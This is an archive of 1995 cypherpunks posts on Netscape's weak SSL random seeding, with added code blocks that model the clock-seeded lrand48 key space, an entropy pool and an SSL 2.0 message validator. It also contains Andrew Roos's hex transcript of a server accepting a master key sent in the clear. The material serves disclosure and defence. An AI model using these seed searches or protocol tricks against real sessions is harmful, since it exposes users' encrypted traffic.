platform has microphones to "measure background noise" or other exotic and
nonstandard inputs.

Years ago, I recall articles in sci.crypt about getting "pretty good random
numbers" from complicated measurements of disk accesses on a local machine,
ticks of the system clock, times between keyboard button presses, etc., all
mixed and convolved together. Not perfect, of course, but if enough bits
are started with (e.g, 2000) when "only" 126 or 512 or whatever are
ultimately used, this "mixing" can probably be pretty damned good. At
least, I doubt any t-shirts will be won.


>  Do you mean that cypherpunks offered to review the netscape code
>if only we made all the source available on the net?  I think that it
>is unrealistic to expect us to release all of our source code to the
>net.
>
>  We will be having at least some of our code reviewed by a
>wider audience, but I don't yet know which code, or how wide a review
>group.  If anyone has specific suggestions for pieces of code that
>you would like to see widely reviewed (such as RNG and seed generation)
>let me know.
>
>  I realize that some cypherpunks think that we should make all of
>our code publicly available.  In an ideal world that would be great,
>but we live in a world with politicians, crooks, lawyers, stockholders,
>etc...  Don't expect to see us posting our entire security
>library source code to cypherpunks.

I think a better approach is to modularize the functions, so that a "PRNG"
chunk could be shown without "damaging" Netscape's market situation. (I
doubt the crypto section is seen as Netscape's market edge, and use of
industry-verified crypto modules would be a net plus, anyway.)

In other words, keep secret (arguably) the things you don't want
competitors to have access to. But things like crypto modules are rarely
trade secrets--if only because the cores are so often licensed anyway--and
can be shown and vetted without affecting the rest of the product.

(I said "arguably" because many will argue for showing all of the source
code, anyway, as the almost-ultimate check on integrity and reliability. And
there may be subtle security flaws that hinge on the overall program, not
just specific parts.)


>  I would love to hear your suggestions for good sources of entropy
>on any systems that our products run on.

See above. This has been a recurring topic in sci.crypt and Cypherpunks---so
recurring, in fact, that several of us have expressed bemusement at seeing
"yet another "How do I generate entropy" argument."

I guess we all (save for Messrs. Goldberg and Wagner) tacitly assumed that a
modern product claiming to have strong crypto would use commonly-accepted
techniques for generating enough entropy. (Commonly used in RSA's crypto
products, and in PGP.)

I suggest you take RSADSI up on their offer to advise you. (Or Cylink, as
the case may soon be.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

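The "limited search space" paragraph above, and Brian Davis's remark that the hole has nothing to do with key length, as an added example (not part of any post in this thread and not Netscape's code): it models the lrand48() generator Ian Goldberg mentions and counts how many distinct keys come out when the seed is a clock value known to within an hour. The key derivation in `make_key`, the one-hour window and the timestamp are assumptions constructed for illustration.

```python
import math

# POSIX drand48-family constants: X' = (A*X + C) mod 2^48.
A, C, MASK48 = 0x5DEECE66D, 0xB, (1 << 48) - 1


class Rand48:
    """Minimal model of srand48()/lrand48()."""

    def __init__(self, seed32):
        # srand48(): the seed fills the high 32 bits, the low 16 are fixed at 0x330E.
        self.x = ((seed32 & 0xFFFFFFFF) << 16) | 0x330E

    def lrand48(self):
        self.x = (A * self.x + C) & MASK48
        return self.x >> 17  # top 31 bits of the 48-bit state


def make_key(seed32, nbytes):
    """Constructed key derivation (an assumption): one byte per lrand48() call."""
    gen = Rand48(seed32)
    return bytes((gen.lrand48() >> 23) & 0xFF for _ in range(nbytes))


def clock_seed_candidates(approx_time, slack_seconds):
    """Every seed consistent with 'the key was made around approx_time'."""
    return range(approx_time - slack_seconds, approx_time + slack_seconds + 1)


def effective_key_bits(candidates, nbytes):
    """log2 of the number of distinct keys the generator can emit."""
    distinct = {make_key(seed, nbytes) for seed in candidates}
    return math.log2(len(distinct))


def audit(approx_time=811_555_200, slack_seconds=3600):
    """Compare nominal key size with what the seed supports.

    approx_time is a constructed timestamp; any value gives the same picture.
    """
    cands = clock_seed_candidates(approx_time, slack_seconds)
    report = {}
    for label, nbytes in (("40-bit export key", 5), ("128-bit key", 16)):
        report[label] = (nbytes * 8, effective_key_bits(cands, nbytes))
    return report


if __name__ == "__main__":
    for label, (nominal, effective) in audit().items():
        print(f"{label}: nominal {nominal} bits, effective {effective:.1f} bits")
```

Both key sizes come out with the same effective strength, because the generator is deterministic and the only unknown is the seed.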





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 20 Sep 95 00:12:42 PDT
To: shields@tembel.org (Michael Shields)
Subject: Re: Investing on Information We Get Here
Message-ID: <ac850e78290210042b29@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:51 AM 9/20/95, Michael Shields wrote:
>> (These computer lists are really great for investors! I heard about the
>> Apple problems a few days before they hit the street, and was able to
>> unload a bunch of shares at $45, a day before it dropped, now down to
>> around $36. "He who hesitates to act on inside information is lost.")
>
>This isn't inside information in the illegal-to-trade-on-in-the-US sense,
>is it?  cypherpunks, while maybe not mainstream, is publicly available.

Didn't you read my last line?

"(Yes, I know that I am not an "insider" by SEC definitions. Poetic license.)"

--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 19 Sep 95 21:25:55 PDT
To: bdavis@thepoint.net
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <9509200424.AA18181@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>The question was, essentially, what do you think should happen to a 
>teenage hacker ...

Oops.  Sorry for the mistake.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc>
Date: Tue, 19 Sep 95 22:51:44 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: [NOISE] Unabomber - crypto-anarchist?!?
In-Reply-To: <ac84f1b9250210046a05@[205.199.118.202]>
Message-ID: <Pine.3.89.9509200017.B1346-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, Timothy C. May wrote:

> Still, his writing style and some of his points seem close enough to some
> of my own points, not to mention his Northern California nexus and
> estimated age, that I'm expecting more inquiries (I deflected one already).
> 
> After the call from the Sheriff's office about my alleged activities, I
> wonder....

Tim May, the UNABOMBER ... too funny for words, hehehe ;)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Wed, 20 Sep 95 00:29:33 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: netscape's response
In-Reply-To: <43oa83$nhm@tera.mcom.com>
Message-ID: <199509200729.AAA24565@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



|   Of course none of this reduces the magnitude of the screw up/bug/design
| flaw/whatever.  I really can't say which of these it was since I wasn't
| around at the time that this code was being written.  I must admit that
| the RNG seed code was not an area that I thought to examine when I took
| over our security library.

It isn't really easy. I guess you were around to see the pointer to
RFC 1750, approx "Security Randomness reqs"?

|   This was a bad mistake on our part, and we are working hard to fix it.
| We have been trying to identify sources of random bits on PCs, Macs, and
| all of the many unix platforms we support.  We are looking at stuff that
| is system dependent, user dependent, hardware dependent, random external
| sources such as the network and the user.  If anyone has specific
| suggestions I would love to hear them so that we can do a better job.

* I think you should use as much user-generated randomness as possible,
  like the mouse movement patterns, interarrival times of events from
  the user interface etc.

* You can also gather statistics from the networking card, like number
  of collisions, packets in/out, number of passing packets etc.

* Measuring the interarrival times of requests/responses from a remote
  server should also be a good one, I guess. It depends on the network
  in between, the actual processes executing on it, the scheduling
  algorithm etc.

* And finally, insert some sampling of the noise in the sound blaster.

* And try to reseed it, as often as possible and convenient. Make it 
  depend on the previous value of the random generator seed, somehow.

The difficult part is to verify the quality of the random seeding and
reseeding. How does it behave on an unloaded system? Could someone put
your system under some strain, and hence affect the random generator
to lock down into a small subspace or even onto a fixed value?

How independent are the values anyway? And when you start to talk
about ergodicity etc, I'm lost anyway. :-)

I think it is important to bring together factors of the user _and_
the environment, preferably an environment that reaches as far from
the local site as possible. This makes "jamming" of the random seed
selection process harder. 

The other problem in gathering random bits for a seed is that most
bits are visible by someone else close enough within your environment.
Interarrival times of packets are fine, but anyone can observe them
with quite a good accuracy. How do you escape the "local environment
problem"? 

                              . - .

One wild idea that I just got was to have servers and clients exchange
random numbers (not seeds of course), in a kind of chaining way. Since
most viewers connect to a number of servers, and all servers are
connected to by many clients, they would mix "randomness sources" with
each other, making it impossible to observe the local environment
only. And the random values would of course be encrypted under the
session key, making it impossible to "watch the wire".

Problems:
* watch out for "multiply by zero" attacks by a rogue server/client.
* watch out for "almost singular values" in the same way.
* only let one source contribute a certain amount of randomness, like
  (key length)/(aver # of peers).
* never reveal your current seed, only a non-trivially derived random 
  value from it. (of course)
* make sure your initial seed is good enough, or the whole thing is
  broken.
* perhaps save part of the previous session state into a protected
  file, to be able to keep up the quality of the initial seed.

I think I like it, perhaps not from a practical point of view as much
as the 'non-attackability' of it. It's quite cypher-a.

But I bet someone has already done this a long time ago. My usual
luck! :-(

If not, I want a 'I saved Netscape!' t-shirt from you, Jeff! 
 
/Christian

PS. I'm a Swede, I don't know if I'm allowed to reveal these state
secrets. So please shut your eyes, ok?
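An added sketch, not from any post here and not Netscape's or Colin Plumb's code, of the pooling advice in this thread: Tim May's "take several times as many bits as needed and distill them down" and the reseeding, per-source limit and never-reveal-the-seed points in the message above. SHA-256 stands in for MD5; the class, the 4x oversampling factor, the 128-bit per-source cap and the sample events are assumptions constructed for the example.

```python
import hashlib

OUT_BITS = 128         # seed size handed to the key generator
OVERSAMPLE = 4         # credit 4x the output size before releasing anything
PER_SOURCE_CAP = 128   # most bits any one source may be credited (constructed policy)


class NotEnoughEntropy(Exception):
    pass


class EntropyPool:
    def __init__(self, saved_state=b""):
        # State saved from a previous session is mixed in but credited nothing.
        self._state = hashlib.sha256(b"init" + saved_state).digest()
        self._credit = {}
        self._draws = 0

    def add(self, source, sample, est_bits):
        """Mix one event in. The new state is a hash over the old state, so a
        hostile sample (all zeros, say) can only stir the pool, not reset it."""
        h = hashlib.sha256(self._state)
        name = source.encode()
        h.update(len(name).to_bytes(2, "big") + name)
        h.update(len(sample).to_bytes(4, "big") + sample)
        self._state = h.digest()
        credited = self._credit.get(source, 0) + max(0, est_bits)
        self._credit[source] = min(PER_SOURCE_CAP, credited)

    def credited_bits(self):
        return sum(self._credit.values())

    def ready(self):
        return self.credited_bits() >= OVERSAMPLE * OUT_BITS

    def draw_seed(self):
        """Return OUT_BITS of derived output; the pool state itself never leaves."""
        if not self.ready():
            need = OVERSAMPLE * OUT_BITS
            raise NotEnoughEntropy(f"{self.credited_bits()} bits credited, need {need}")
        self._draws += 1
        ctr = self._draws.to_bytes(8, "big")
        out = hashlib.sha256(b"out" + self._state + ctr).digest()[: OUT_BITS // 8]
        # Ratchet so a later state compromise does not expose earlier outputs.
        self._state = hashlib.sha256(b"next" + self._state + ctr).digest()
        return out

    def state_for_next_session(self):
        """Value to keep in a protected file; derived, so it is not the live state."""
        return hashlib.sha256(b"save" + self._state).digest()


def demo_pool():
    """Feed constructed events from four sources and return the pool."""
    pool = EntropyPool()
    for i in range(200):  # mouse: (x, y, delta-t in ms), credited 2 bits each
        pool.add("mouse", bytes([(37 * i) % 256, (91 * i) % 256, (13 * i) % 50]), 2)
    for src in ("keyboard", "network", "disk"):
        for i in range(64):  # interarrival times in microseconds, 2 bits each
            pool.add(src, ((7919 * i) % 100_003).to_bytes(4, "big"), 2)
    return pool


if __name__ == "__main__":
    pool = demo_pool()
    print("credited bits:", pool.credited_bits(), "seed:", pool.draw_seed().hex())
```

The per-event credits are the caller's conservative guesses; the pool distills what it is given and cannot manufacture unpredictability, which is why identical inputs give identical seeds.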




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 20 Sep 95 00:18:58 PDT
To: cypherpunks@toad.com
Subject: Netscape sub rosa?
Message-ID: <ac850f682a021004638e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:33 AM 9/20/95, Alan Olsen wrote:
>At 03:06 PM 9/19/95 -0500, you wrote:
>>NPR reported on the security flaw in Netscape,
>>
>>3:05 pm CDT.
>
>As well as CNN Headline news.  (With the big Netscape N logo and
                                          ^^^^^^^^^^^^^^^^^^^
>everything.)  They spent a fair amount of time (for CNN Headline news) on
>the story.

Gee, where's that "Cypherpunks logo" when you really need it?

A rose covering the Netscape "N" logo? A crypto eagle swooping down and
pecking at weak keys?

Netscape sub rosa?

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Wed, 20 Sep 95 00:38:41 PDT
To: "Ed Carp [khijol SysAdmin]" <khijol!erc@uunet.uu.net>
Subject: Re: [NOISE] Unabomber - crypto-anarchist?!?
In-Reply-To: <Pine.3.89.9509200017.B1346-0100000@khijol>
Message-ID: <199509200738.AAA25102@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| On Tue, 19 Sep 1995, Timothy C. May wrote:
| 
| > Still, his writing style and some of his points seem close enough to some
| > of my own points, not to mention his Northern California nexus and
| > estimated age, that I'm expecting more inquiries (I deflected one already).
| > 
| > After the call from the Sheriff's office about my alleged activities, I
| > wonder....
| 
| Tim May, the UNABOMBER ... too funny for words, hehehe ;)

A frame-up, I bet! What bothers me is that it makes sense from a
certain twisted kind of view. Discrediting the group that actually
is a problem when it comes to ITAR, and recently has had good
publicity. And Tim being one of those who spotted Clipper coming,
early on. 

And the punch line; 
  "Look the terrorists and the crypto anarchists are the SAME guys!"


(Tim, not that I agree with your political views, but many Swedes
are like that. ;-) )

Why is it that my conspiratorial side has blossomed once I joined
this group? I've posted more severely conspiratorial posts recently
than I've done in my whole previous Inet presence. I gotta stop. :-)

/Christian







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 20 Sep 95 00:45:44 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: netscape's response
In-Reply-To: <43oa83$nhm@tera.mcom.com>
Message-ID: <199509200740.AAA15940@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



>   Is this offer good for netscape employees?  What if I post the code
> without having had to decompile it?   :-)
> 

	That depends on whether or not you do it with the approval of
your superiors. ;-)

	Seriously, if you manage to convince the
management/whoever-needs-to-decide a significant portion of the
security code can be released for public scrutiny, you deserve a
t-shirt.
	The goal here is to have a piece of software we can trust.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Roos <AndrewR@beetle.vironix.co.za>
Date: Tue, 19 Sep 95 15:45:31 PDT
To: sameer <sameer@c2.org>
Subject: A Netscape Server implementation error
Message-ID: <305F486F@beetle.vironix.co.za>
MIME-Version: 1.0
Content-Type: text/plain



Hi Sameer

Thanks in advance for the T-shirt, and I like the Web site. On the   
subject of Netscape implementation errors, I note that the SSL protocol   
specification states in section 5.6.1 (CLIENT-MASTER-KEY) that "It is   
also an error if CLEAR-KEY-LENGTH is non-zero and the CIPHER-KIND is
not an export cipher".

However, I note that Netscape Commerce Server 1.1 will happily accept a   
"secure" connection using the non-export cipher SSL_CK_RC4_128_WITH_MD5,   
even if the CLEAR-KEY-LENGTH is set to 16 and the *entire* master key is   
sent unencrypted.

Here is an extract from an SSL session with www.netscape.com which   
illustrates the oversight:

 ------------------------------- Start of Session ---------------------------

(1) The session was initialised as normal, and the following values were   
exchanged in the SERVER-HELLO and CLIENT-HELLO:

Challenge:
a2 ff 2e 94 8d f9 f4 e2 2c f6 bd ae 7f 47 db 6c

Connection id:
ef 47 3b 44 db d9 8d 1a f0 da 3e 14 73 97 a3 1f

(2) I then sent the following CLIENT-MASTER-KEY message, which is   
reproduced in full:

SSL Record Header:
80 9a

Message type: SSL_MT_CLIENT_MASTER_KEY
02

Cipher kind: SSL_CK_RC4_128_WITH_MD5
01 00 80

Clear key length: 16
00 10

Encrypted key length: 128 bytes
00 80

Key arg length: 0
00 00

Clear key data: the *entire* master key sent in the clear
af 24 2e e8 2b b1 75 d1 27 a2 b8 76 8b 49 c3 f3

Encrypted key: this is a zero-length block formatted using PKCS#1 block   
type 2 and encrypted under Netscape's public key. Since it contains no   
data, an eavesdropper would not need to decrypt it in order to decrypt   
the rest of the session.

af 24 2e e8 2b b1 75 d1 27 a2 b8 76 8b 49 c3 f3
9b 9b 0b ff cd e8 2f 2c 0d 16 4e 90 73 26 4e e7
e0 3f 45 8a ce 9a 21 d6 2a 6b b8 9a 20 4e bc cf
d0 01 36 86 1c db e0 8b a8 e3 4c 9b 15 11 ea 95
b1 50 3f c9 42 9a 97 77 0f 9d 29 97 7e 87 1b 8f
77 b6 c9 c6 53 90 5b 74 4c 92 99 62 ad 8b bf 4c
28 ac 1b 11 32 64 56 c9 f0 d5 6f c9 89 6b 55 3f
b9 42 aa 7b 7c f0 a1 89 93 22 13 46 e2 58 63 23
b2 51 83 92 76 46 05 65 87 86 5b 52 5a d1 02 ee

(3) I calculated the session keys in the normal manner, using the master   
key which was sent entirely in the clear. The result was:

Client read key:
14 3e 84 a6 54 57 d6 51 94 cf 54 f5 5a 29 4a ef

Client write key:
9d e1 16 77 92 ee 89 f2 2d 30 c2 a2 e1 77 9f 5d

(4) Instead of disconnecting, the Netscape server sent the following   
reply (the header has been removed):

28 40 00 75 b8 d6 60 68 f5 cf ba 65 78 49 35 83
d3 3a b5 d3 81 23 2d f8 7d c6 f8 47 4d 0c 62 c3
b4

This was decrypted using the client read key to give the following   
SERVER_VERIFY message:

Message Authentication Code:
7b 95 2a 84 a1 55 fc 59 32 6b 53 ec e0 1d 80 4a

Message type: SSL_MT_SERVER_VERIFY
05

Challenge data (which agrees with the challenge sent in the   
CLIENT-HELLO):
a2 ff 2e 94 8d f9 f4 e2 2c f6 bd ae 7f 47 db 6c

(5) The negotiation phase of the protocol was concluded with encrypted   
CLIENT-FINISHED and SERVER_FINISHED messages as per normal.

(6) I sent the encrypted HTTP command "GET / HTTP/1.0" and received the   
following text (after decryption, stripping MAC and header, etc.):

HTTP/1.0 200 OK
Server: Netscape-Commerce/1.1
Date: Tuesday, 19-Sep-95 21:15:23 GMT
Last-modified: Tuesday, 19-Sep-95 21:14:09 GMT
Content-length: 5278
Content-type: text/html

Followed by the Netscape home page, which included the following   
statement:

Find out how   
Netscape is responding immediately to upgrade customers and minimize risk   
of future threats.

(7) Having obtained the warm, fuzzy feeling I so desired, I closed the   
connection secure in the knowledge that my secrets were safe with   
Netscape.

 -------------------------------- End of Session -----------------------------

This shows that Commerce Server 1.1 is prepared to accept a "secure"   
connection which is completely insecure as the entire master key has been   
sent in the clear and an eavesdropper could decrypt the session without   
any cryptanalysis.

This does not mean that sessions between "well-behaved" browsers and   
Netscape servers are insecure, since the browser will send all 16 bytes   
of the key encrypted. Neither could it be used for an active attack,   
since if a new master was substituted for the one sent by the client,   
this would be detected during authentication of the SERVER-VERIFY   
message.

However, it would provide an opportunity for a malicious browser supplier   
to "doctor" secure browsers so that they sent all (or part) of the master   
key in the clear, even when using non-export ciphers. (Of course there   
are better ways to do this; the "random padding" of PKCS block type 2   
comes to mind).

Although this is not nearly as important a result as Ian and David's, it
is the first server hack, so can I have another T shirt?  :-)

Andrew
________________________________________________________________
Andrew Roos <andrewr@vironix.co.za>

// C++ programmers have class (but not much inheritance)

PGP Fingerprint: F6 D4 04 6E 4E 16 80 59 3A F2 27 94 8B 9F 40 26
Full key at ftp://ftp.vironix.co.za/PGP-keys/AndrewRoos
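
Added example, not part of Andrew Roos's message and not Netscape's code: a Python sketch of the server-side check that section 5.6.1 calls for, parsing a CLIENT-MASTER-KEY record laid out as in the session extract above and refusing a non-zero CLEAR-KEY-LENGTH with a non-export cipher. The function names are hypothetical, the cipher codes other than SSL_CK_RC4_128_WITH_MD5 are taken from the SSL 2.0 specification rather than from the post, and the 128-byte encrypted key is a constructed placeholder.

```python
import struct

SSL_MT_CLIENT_MASTER_KEY = 0x02

# SSL 2.0 CIPHER-KIND codes -> (name, is_export_cipher).
CIPHER_KINDS = {
    b"\x01\x00\x80": ("SSL_CK_RC4_128_WITH_MD5", False),
    b"\x02\x00\x80": ("SSL_CK_RC4_128_EXPORT40_WITH_MD5", True),
    b"\x03\x00\x80": ("SSL_CK_RC2_128_CBC_WITH_MD5", False),
    b"\x04\x00\x80": ("SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5", True),
    b"\x05\x00\x80": ("SSL_CK_IDEA_128_CBC_WITH_MD5", False),
    b"\x06\x00\x40": ("SSL_CK_DES_64_CBC_WITH_MD5", False),
    b"\x07\x00\xc0": ("SSL_CK_DES_192_EDE3_CBC_WITH_MD5", False),
}


class HandshakeError(Exception):
    """Raised when a CLIENT-MASTER-KEY message must be refused."""


def record_body(record: bytes) -> bytes:
    """Strip the 2-byte record header (high bit set, 15-bit length)."""
    if len(record) < 2 or not record[0] & 0x80:
        raise HandshakeError("expected a 2-byte record header")
    length = ((record[0] & 0x7F) << 8) | record[1]
    if len(record) - 2 != length:
        raise HandshakeError("record length does not match header")
    return record[2:]


def parse_client_master_key(body: bytes) -> dict:
    """Split the message into its fields, checking every length first."""
    if len(body) < 10:
        raise HandshakeError("message shorter than its fixed fields")
    if body[0] != SSL_MT_CLIENT_MASTER_KEY:
        raise HandshakeError("not a CLIENT-MASTER-KEY message")
    clear_len, enc_len, arg_len = struct.unpack(">HHH", body[4:10])
    if 10 + clear_len + enc_len + arg_len != len(body):
        raise HandshakeError("length fields do not add up to the message size")
    fields = {"cipher_kind": body[1:4]}
    offset = 10
    for name, size in (("clear_key", clear_len),
                       ("encrypted_key", enc_len),
                       ("key_arg", arg_len)):
        fields[name] = body[offset:offset + size]
        offset += size
    return fields


def validate(fields: dict) -> str:
    """Apply the section 5.6.1 rule; return the cipher name if acceptable."""
    kind = CIPHER_KINDS.get(fields["cipher_kind"])
    if kind is None:
        raise HandshakeError("unknown CIPHER-KIND")
    name, is_export = kind
    if fields["clear_key"] and not is_export:
        raise HandshakeError(
            "CLEAR-KEY-LENGTH is %d but %s is not an export cipher"
            % (len(fields["clear_key"]), name))
    return name


def check_record(record: bytes):
    """Return (True, cipher_name) or (False, reason_for_refusal)."""
    try:
        return True, validate(parse_client_master_key(record_body(record)))
    except HandshakeError as exc:
        return False, str(exc)


def build_record(cipher_kind, clear_key, encrypted_key, key_arg=b""):
    """Test helper: assemble a record in the layout shown in the post."""
    body = (bytes([SSL_MT_CLIENT_MASTER_KEY]) + cipher_kind
            + struct.pack(">HHH", len(clear_key), len(encrypted_key),
                          len(key_arg))
            + clear_key + encrypted_key + key_arg)
    return struct.pack(">H", 0x8000 | len(body)) + body


# Clear key bytes as quoted in the post; encrypted key is a constructed
# placeholder of the stated length (128 bytes), not the posted ciphertext.
CLEAR_KEY_FROM_POST = bytes.fromhex(
    "af 24 2e e8 2b b1 75 d1 27 a2 b8 76 8b 49 c3 f3")
PLACEHOLDER_ENCRYPTED_KEY = bytes(128)
ROOS_STYLE_RECORD = build_record(
    b"\x01\x00\x80", CLEAR_KEY_FROM_POST, PLACEHOLDER_ENCRYPTED_KEY)

if __name__ == "__main__":
    print(check_record(ROOS_STYLE_RECORD))
```
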




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Wed, 20 Sep 95 00:58:27 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: netscape's response
In-Reply-To: <ac85072c28021004746c@[205.199.118.202]>
Message-ID: <9509200055.ZM206@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


  Just a clarification of my last message.  I didn't mean to imply that
we didn't know about using time/position from mouse events, RFC 1750,
reading from the microphone.  I knew all about this stuff, but made
the fatal mistake of assuming that what we shipped in 1.1 was
"good enough", and that I could look at it later, after I had dealt
with a bunch of other stuff that needed to be done.

  So far I've received several very thoughtful replies, with lots of good
suggestions, most of which I already knew about, but some new ones too.

  Thanks to those who have responded already, and also to those who
will respond.  I'm sorry, but I can't guarantee an individual response...

	--Jeff


-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 20 Sep 95 01:17:15 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: netscape's response
In-Reply-To: <43oa83$nhm@tera.mcom.com>
Message-ID: <199509200812.BAA17876@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
>   If the attacker does not have access to the machine to determine the
> pid and ppid, then the attack will take longer.  If the Navigator
> is running on an SGI machine with a high resolution cycle counter then
> it is used as the first of the two 32bit seeds.

	The release mentioned "computation time". In my book that
doesn't include the setup time involved in figuring out how to snag
the packets, sending the sendmail spoofs in order to approximate the
pid and ppid, etc.

>   I believe that it would take much longer than 1 minute to mount an
> attack against a mac, pc, or unix machine that the attacker was not

	"time to mount an attack" is not "computation time".

	I'm really not debating with -you- though here, just
describing how the release was inaccurate. I don't deny any of your
statements

> logged on to.  I don't know exactly how the few hour number was
> calculated, since it was done by marketing with input from someone else
> in the group.  Another interesting data point is that the unix version,
> which was most vulnerable, accounts for less than 10% of our user
> base, according to the yahoo random link stats.

	Is UNIX really the most vulnerable? How many bits did the
tickcount account for? Seems to me that guessing just time & tick
would be easier than guessing time, pid and ppid if you are not logged
into the machine in question. . .

> 
>   Of course none of this reduces the magnitude of the screw up/bug/design
> flaw/whatever.  I really can't say which of these it was since I wasn't
> around at the time that this code was being written.  I must admit that
> the RNG seed code was not an area that I thought to examine when I took
> over our security library.

	I don't know what your background is, so don't take this as a
personal attack please, but someone who is trained in computer
security and cryptography implementation should *know* to check these
things. Hell, even I would check those things, and I'm not a
cryptographer by any means.

> 
>   This was a bad mistake on our part, and we are working hard to fix it.
> We have been trying to identify sources of random bits on PCs, Macs, and
> all of the many unix platforms we support.  We are looking at stuff that
> is system dependent, user dependent, hardware dependent, random external
> sources such as the network and the user.  If anyone has specific
> suggestions I would love to hear them so that we can do a better job.
> 

	Again, Kudos to Netscape for the quick response.

> > 	A group which offered to review the first version, but
> > Netscape refused.
> 
>   Do you mean that cypherpunks offered to review the netscape code
> if only we made all the source available on the net?  I think that it
> is unrealistic to expect us to release all of our source code to the
> net.  

	I was referring to Jim Bidzos's comment, posted to
cypherpunks. 
	The release I will be sending out is written much more cleanly
than what I initially posted to cypherpunks.

> 
>   We will be having at least some of our code reviewed by a
> wider audience, but I don't yet know which code, or how wide a review
> group.  If anyone has specific suggestions for pieces of code that
> you would like to see widely reviewed (such as RNG and seed generation)
> let me know.

	Great! 

> 
>   I realize that some cypherpunks think that we should make all of
> our code publicly available.  In an ideal world that would be great,
> but we live in a world with politicians, crooks, lawyers, stockholders,
> etc...  Don't expect to see us posting our entire security
> library source code to cypherpunks.

	Ah but who's to stop an anonymous posting. nudgenudge. ;)
(This is a -joke-, for those excessively humor impaired)

> > 	From their release it looks like they aren't finding a better
> > source of entropy, but just using *more* sources of entropy. Doesn't
> > mean that the entropy is good.
> 
>   I would love to hear your suggestions for good sources of entropy
> on any systems that our products run on.

	When I wrote that sentence I misread the release -- my
apologies-- my initial reading gave me the impression that the only
thing that was being done was increasing the key size to 300 with no
additional work towards finding sources of randomness, which you have
said you were working on.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 20 Sep 95 01:23:47 PDT
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION CORRECTS INACCURACIES IN NETSCAPE PRESS RELEASE
Message-ID: <199509200818.BAA18511@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Sept. 20, 1995
For Immediate Release
Contact: Sameer Parekh 510-601-9777

COMMUNITY CONNEXION CORRECTS INACCURACIES IN NETSCAPE PRESS RELEASE

In response to Ian Goldberg and David Wagner's recent cryptanalysis
and defeat of Netscape Navigator's security, Netscape Communications
Corporation has recently issued a press release describing the work
Ian and David had done, announced a fix, and offered comments on what
they felt were the implications on the security of their software.

Community ConneXion congratulated Netscape Communications Corporation
today for their quick response to this security problem. The fact that
they responded to the problem within two days of its publication
reflects well upon their responsiveness to the internet community,
said Sameer Parekh, Community ConneXion founder.

Sameer noted, however, that their release contained a number of
inaccuracies. He wrote a document detailing the inaccuracies that he
found, available via the World-Wide-Web at
http://www.c2.org/hacknetscape/critique.phtml.

He noted that they overestimated the time necessary to exploit the bug
